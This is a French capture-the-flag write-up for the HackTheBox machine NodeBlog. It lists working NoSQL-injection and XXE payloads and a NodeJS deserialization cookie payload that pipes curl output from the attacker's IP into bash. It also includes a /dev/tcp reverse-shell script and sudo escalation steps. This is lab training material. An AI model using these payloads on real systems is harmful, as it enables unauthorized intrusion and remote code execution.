NodeBlog HackTheBox (WriteUp)

Hack The Boxapp.hackthebox.com

Skills:

NoSQL Injection (Authentication Bypass)
XXE File Read
NodeJS Deserialization Attack (IIFE Abusing)
Mongo Database Enumeration

Reconnaissance

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 -vvv 10.10.11.139

Scan de la version des ports avec Nmap 22,5000

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,5000 10.10.11.139 -oN targeted

Analyse du Port 5000 - Application NodeJS

Un panneau d'administration est découvert.
L'utilisateur "admin" est valide.

Vulnérabilité NoSQL Injection (Bypass d'authentification)

Interception de la requête avec Burp Suite.

Test des injections classiques :

username=admin&password[$ne]=toto

Cela ne fonctionne pas.

Conversion en JSON et modification du Content-Type en application/json :

{
  "user": "admin",
  "password": { "$ne": null }
}

Résultat : Authentification réussie !

Exploitation de la vulnérabilité XXE Injection

Upload d'un fichier TXT : refusé, seuls les fichiers XML sont acceptés.

Hello this is a test

Format requis :

<post>
    <title>Example Post</title>
    <description>Example Description</description>
    <markdown>Example Markdown</markdown>
</post>

Envoi d'un fichier XML contenant une entité externe pour lire /etc/passwd :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<post>
    <title>Example Post</title>
    <description>Example Description</description>
    <markdown>&xxe;</markdown>
</post>

Résultat : Le contenu de /etc/passwd est affiché.

Découverte d'un utilisateur admin.

Injection pour lire /opt/blog/server.js et identifier les identifiants stockés.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///opt/blog/server.js" >]>
<post>
    <title>Example Post</title>
    <description>Example Description</description>
    <markdown>&xxe;</markdown>
</post>

Exploitation de la désérialisation NodeJS

Découverte d'une fonction qui désérialise les cookies de session.

Création d'un Payload:

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ping -c 1 10.10.14.61', function(error, stdout, stderr) { console.log(stdout) }); }()"}

Écoute du trafic ICMP avec :

tcpdump -i tun0 icmp -n

Url Encode:

%7b%22%72%63%65%22%3a%22%5f%24%24%4e%44%5f%46%55%4e%43%24%24%5f%66%75%6e%63%74%69%6f%6e%28%29%7b%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%70%69%6e%67%20%2d%63%20%31%20%31%30%2e%31%30%2e%31%34%2e%32%38%27%2c%20%66%75%6e%63%74%69%6f%6e%28%65%72%72%6f%72%2c%20%73%74%64%6f%75%74%2c%20%73%74%64%65%72%72%29%20%7b%20%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%74%64%6f%75%74%29%20%7d%29%3b%20%7d%28%29%22%7d

Construction d'une RCE via URL Encoding et injection dans les cookies.

tcpdump -i tun0 icmp -n

RCE - Vulnérabilité Deserialization (nodejs)

Création d'un script de reverse shell index.html :

#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.61/443 0>&1

Démarrage d'un serveur HTTP :

python3 -m http.server 80

Mise en écoute :

nc -nlvp 443

Envoi de la charge utile :

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('curl http://10.10.14.61 | bash', function(error, stdout, stderr) { console.log(stdout) }); }()"}

Url Encode:

%7b%22%72%63%65%22%3a%22%5f%24%24%4e%44%5f%46%55%4e%43%24%24%5f%66%75%6e%63%74%69%6f%6e%28%29%7b%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%63%75%72%6c%20%68%74%74%70%3a%2f%2f%31%30%2e%31%30%2e%31%34%2e%36%31%20%7c%20%62%61%73%68%27%2c%20%66%75%6e%63%74%69%6f%6e%28%65%72%72%6f%72%2c%20%73%74%64%6f%75%74%2c%20%73%74%64%65%72%72%29%20%7b%20%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%74%64%6f%75%74%29%20%7d%29%3b%20%7d%28%29%22%7d

Résultat : Accès shell obtenu.

Flag user.txt :)

Élévation de Privilèges

Mongo Database Enumeration

Connexion à la base de données MongoDB (port 27017 ouvert) :

mongo
show dbs
use blog
show tables
db.users.find()

user: admin
password : IppsecSaysPleaseSubscribe

Sudo (ALL:ALL)

Vérification des privilèges sudo :

sudo -l

Résultat : l'utilisateur admin peut exécuter sudo su sans mot de passe.

Passage en root :

sudo su

Flag root.txt :)

Mis à jour il y a 1 an

hashtagReconnaissance

hashtagAnalyse du Port 5000 - Application NodeJS

hashtagVulnérabilité NoSQL Injection (Bypass d'authentification)

hashtagExploitation de la vulnérabilité XXE Injection

hashtagExploitation de la désérialisation NodeJS

hashtagRCE - Vulnérabilité Deserialization (nodejs)

hashtagEnvoi de la charge utile :

hashtagFlag user.txt :)

hashtagÉlévation de Privilèges

hashtagMongo Database Enumeration

hashtagSudo (ALL:ALL)

hashtagFlag root.txt :)